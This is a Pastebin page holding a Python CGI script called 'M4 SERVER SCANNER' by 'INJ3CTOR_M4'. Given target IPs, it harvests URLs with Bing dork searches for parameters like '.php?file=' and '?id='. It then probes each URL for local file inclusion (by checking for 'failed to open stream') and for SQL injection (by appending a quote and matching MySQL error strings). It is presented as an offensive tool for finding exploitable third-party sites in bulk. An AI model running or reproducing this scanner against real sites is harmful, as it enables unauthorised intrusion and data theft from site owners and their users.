Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/Python27/python
- #M4 SCANNER // By INJ3CTOR_M4
- import cgi, requests, urllib, re
- import cgitb; cgitb.enable()
- print """Content-type: text/html\n\n
- <style type="text/css">
- * { font-family: Arial; font-size: 12px; }
- body { margin: 0px; }
- pre { margin: 2px; }
- </style>
- <title> M4 SERVER SCANNER </title>
- <form method="POST">
- <center>
- <br /><big><b><font color=black>[+] M4 SERVER SCANNER | By INJ3CTOR_M4 [+] <br />
- <font color=black>[+] CGI Version [+] </b><br /></big><br />
- <textarea cols=84 rows=10 name="targets" placeholder='127.0.0.1' /></textarea><br /><br />
- <select name='scantype'>
- <option value='Local File Include'>Local File Include</option>
- <option value='SQL Injection'>SQL Injection</option>
- <input type=submit value='Start Scan ..' />
- </form>
- """
- def _Fix(site):
- try:
- return re.findall('(.*?)?(.*?)=(.*?)', site)[0][1]+'='
- except:
- pass
- def lfi(link):
- site = _Fix(link)
- try:
- if re.search('failed to open stream', requests.get(site+'_m4_').text):
- print "<br /><b> %s <font color=green> Vulnerable !</font></b><br />"%(site)
- else:
- print "<br /><b> %s <font color=red> Not Vulnerable !</font></b><br />"%(link)
- except:
- pass
- def check_sql_inj(link):
- try:
- data = requests.get(link+'%27').text
- if re.search('error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error', data):
- print "<br /><b> %s <font color=green> Vulnerable !</font></b><br />"%(link)
- else:
- print "<br /><b> %s <font color=red> Not Vulnerable !</font></b><br />"%(link)
- except:
- pass
- def Bing(dork):
- user_agent = {'User-Agent': 'SamsungI8910/SymbianOS/9.1 Series60/3.0'}
- alllinks = []
- i=1
- while True:
- data = requests.get('http://www.bing.com/search?q='+urllib.quote_plus(dork)+'&first='+str(i), headers=user_agent).text
- matches = re.findall('<h2 class="sb_h3 cttl"><a href="(.*?)"',data)
- for link in matches:
- alllinks.append(link)
- i+=10
- if not re.search('class="sb_pagN"', data):
- break
- return list(set(alllinks))
- form = cgi.FieldStorage()
- if form.has_key("targets"):
- targets = form.getvalue("targets").split("\n")
- if form.has_key("scantype"):
- scantype = form.getvalue("scantype")
- if scantype == 'Local File Include':
- for ip in targets:
- print '<br /><br /><b>Start Scanning %s ...</b><br /><br />' %(ip)
- dorks = ['.php?action=', '.php?download=', '.php?file=', '.php?f=', '.php?page=', '.php?pg=', '.php?pagina=', '.php?lang=', '.php?language=']
- for dork in dorks:
- for link in Bing('ip:'+ip+' '+dork):
- lfi(link)
- elif scantype == 'SQL Injection':
- for ip in targets:
- print '<br /><br /><b>Start Scanning %s ...</b><br /><br />' %(ip)
- dorks = ['?id=', '.php?id=', '.php?category=', '.php?cat=', '.php?article_id=', '.php?product_id=', '?attachment_id=']
- for dork in dorks:
- for link in Bing('ip:'+ip+' '+dork):
- check_sql_inj(link)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement